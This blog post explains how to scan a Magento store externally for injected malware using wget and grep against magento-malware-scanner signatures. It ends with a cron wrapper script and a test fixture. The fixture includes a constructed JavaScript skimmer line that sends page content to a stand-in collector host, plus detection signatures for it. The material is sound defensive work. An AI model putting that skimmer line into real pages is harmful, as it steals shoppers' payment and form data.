Magento External Malware Scans
Published: August 5, 2017
magento-malware-scanner is an extremely valuable tool to help keep your Magento installation secure. Scanning a codebase for malware is dead simple…
$ wget git.io/mwscan.txt
$ grep -Erlf mwscan.txt /path/to/magento
However, it’s equally if not more important to run an external scan of your Magento installation. Here I’ll cover why and how.
Why Do I Need To Run An External Scan?
You need to run an external scan because scanning your codebase alone misses cases where the malware is injected into the database rather than the file system. This class of attack is extremely common because the attacker can install malware simply by accessing the admin panel and updating “Miscellaneous HTML” or a CMS block; no access to the file system on the server is needed, so a file-based scan never sees it. The injected content only shows up in the HTML the store serves to visitors, which is exactly what an external scan looks at.
How Do I Do It?
Fortunately, it’s not particularly difficult to run an external scan. You can use wget to download the contents of a page and then run the returned HTML through magento-malware-scanner’s signatures:
$ wget -O result https://www.example.com && grep -Elf mwscan.txt result
What If The Malware Is Not Inlined?
wget -O will catch cases where the malware is inlined into the HTML document, but it will miss malware that is referenced via a <script> tag. To solve this we can use the -p flag to download the “page requisites”. This will download the scripts referenced via a <script> tag (along with stylesheets and images) into a directory named after the host, which we then scan recursively:
$ wget -p https://www.example.com && grep -Erlf mwscan.txt www.example.com
What If The Malware Is Hosted Elsewhere?
Good point, the -p flag by default will only download the assets from the same host. We need to combine it with the -H flag (span hosts) to download from other hosts. Since we are not using -r, spanning hosts only applies to the page requisites, so wget will not crawl beyond the assets the page actually references. It’s easiest to additionally use the -P flag (directory prefix) to put everything into a single folder:
$ wget -p -H -P scan https://www.example.com && grep -Erlf mwscan.txt scan
At this point we will be scanning inlined scripts as well as scripts referenced from the same host and from other hosts. One caveat: wget does not execute JavaScript, so a script that is only injected at runtime by another script will not be downloaded, and malware that only serves itself to real browsers may hide from wget’s default User-Agent (the --user-agent option lets you present a browser’s).
Leveling Up Your External Scans
Scanning https://www.example.com is great, but what if the malware is in a static block that is only inserted into the page on the checkout page? In that case, we won’t catch it. Two helpers under the mwscanutils path cover this:
- Send a request to https://www.example.com/mwscanutils/contentdump. This endpoint simply dumps ALL the content from EVERY CMS page and block, as well as the contents of the miscellaneous scripts and miscellaneous HTML fields, so a single wget of it covers blocks that only appear on some pages.
- Fetch the HTML for the checkout page via wget. Typically the request would be redirected because the session contains no quote items, but if you pass the mwscanutils_force param the page will still be loaded (https://www.example.com/checkout/onepage/index/mwscanutils_force/1). (Currently only in the Magento 1 version.)
Some Final Pro Tips
A couple final pro-tips with external scans…
- Regularly run both an internal and an external scan against your Magento installation. Ideally you should be doing this on a cron. You can also use the -q flag (quiet) so wget does not produce any output; grep -l prints only when a file matches, so the cron job stays silent unless something is found.
- Run your external scans on a dedicated server that is not the one hosting the Magento installation. If the attacker gains access to the Magento system they could simply disable the cron job, preventing you from ever getting any alerts.
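Putting the pieces together (the spanned-host download from “What If The Malware Is Hosted Elsewhere?”, the extra mwscanutils URLs, and the cron advice above), here is an added example of a cron-friendly wrapper script. It is not code from the original post or from magento-malware-scanner; the function names (fetch_pages, scan_dir, make_fixture), the sigs.txt signatures and the sample site built by make_fixture are constructed for an offline demonstration and are not real mwscan.txt signatures or real malware.

```shell
#!/bin/sh
# Added example, not code from the original post or from
# magento-malware-scanner. fetch_pages, scan_dir, make_fixture and sigs.txt
# are names chosen here for illustration.

# fetch_pages DIR URL...: download each URL plus its page requisites (-p),
# following references to other hosts (-H), into one directory (-P),
# quietly (-q). Needs network, so the offline demo below does not call it.
fetch_pages() {
  dir=$1
  shift
  wget -q -p -H -P "$dir" "$@"
}

# scan_dir SIGNATURES DIR: grep the downloaded tree against the signature
# file. Prints matching file names and returns 1 on any hit, 0 when clean,
# so cron (or an `|| mail ...` chain) can react to the exit status.
scan_dir() {
  hits=$(grep -Erlf "$1" "$2" || true)
  if [ -n "$hits" ]; then
    printf '%s\n' "$hits"
    return 1
  fi
  return 0
}

# make_fixture ROOT: builds a constructed sample of what `wget -p -H -P scan`
# leaves on disk (one directory per host) plus a tiny constructed signature
# file. Everything here is made up for the demo.
make_fixture() {
  root=$1
  mkdir -p "$root/scan/www.example.com" "$root/scan/cdn.example.net" \
           "$root/clean/www.example.com"
  # constructed signatures: an obfuscation idiom and a suspicious drop URL
  printf '%s\n' 'document\.write\(unescape\(' \
                'cc-collector\.example/gate\.php' > "$root/sigs.txt"
  # clean page: the inlined HTML matches nothing
  printf '<html><body><script src="https://cdn.example.net/app.js"></script></body></html>\n' \
    > "$root/clean/www.example.com/index.html"
  # same page, but the script it references from another host is a
  # constructed skimmer; only the spanned-host download (-H) catches it
  cp "$root/clean/www.example.com/index.html" "$root/scan/www.example.com/index.html"
  printf '%s\n' '// constructed: fake skimmer that exfiltrates form data' \
    'document.forms[0].onsubmit=function(){new Image().src="https://cc-collector.example/gate.php?d="+btoa(document.body.innerText)};' \
    > "$root/scan/cdn.example.net/app.js"
}

# Real use from cron on a dedicated host (not the Magento server):
#   fetch_pages scan https://www.example.com \
#     https://www.example.com/checkout/onepage/index/mwscanutils_force/1 \
#     https://www.example.com/mwscanutils/contentdump
#   scan_dir mwscan.txt scan || echo "malware signatures matched" >&2
```

The exit status is the useful part: cron only mails you when the job prints something, and scan_dir prints nothing and returns 0 on a clean run, so a hit both produces output and fails the job, which is what you want for alerting. Download into a fresh directory each run (or delete it first) so stale files from an earlier infection do not keep tripping the scan.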